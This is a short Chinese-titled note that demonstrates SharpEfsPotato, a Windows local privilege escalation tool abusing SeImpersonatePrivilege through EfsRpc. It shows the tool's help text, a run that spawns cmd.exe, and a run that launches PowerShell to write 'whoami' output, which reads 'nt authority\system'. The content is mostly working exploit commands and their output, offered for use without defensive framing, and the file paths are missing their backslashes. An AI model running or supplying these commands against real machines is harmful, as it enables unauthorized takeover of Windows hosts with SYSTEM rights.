提权 - SharpEfsPotato

C:temp>SharpEfsPotato.exe -hSharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
  -p, --prog=VALUE           Program to launch (default cmd.exe)  -a, --args=VALUE           Arguments for program (default null)  -h, --help                 Display this help

C:temp>SharpEfsPotato.exeSharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f44259a4a-cbea-499b-9dc5-a9b1c13a4b9fdf1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!

C:temp>SharpEfsPotato.exe -p C:Windowssystem32WindowsPowerShellv1.0powershell.exe -a "whoami | Set-Content C:tempw.log"SharpEfsPotato by @bugch3ck  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/c56e1f1f-f91c-4435-85df-6e158f68acd2c56e1f1f-f91c-4435-85df-6e158f68acd2df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:[x]RpcBindingSetAuthInfo failed with status 0x6d3[+] Server connected to our evil RPC pipe[+] Duplicated impersonation token ready for process creation[+] Intercepted and authenticated successfully, launching program[+] Process created, enjoy!
C:temp>type C:tempw.lognt authoritysystem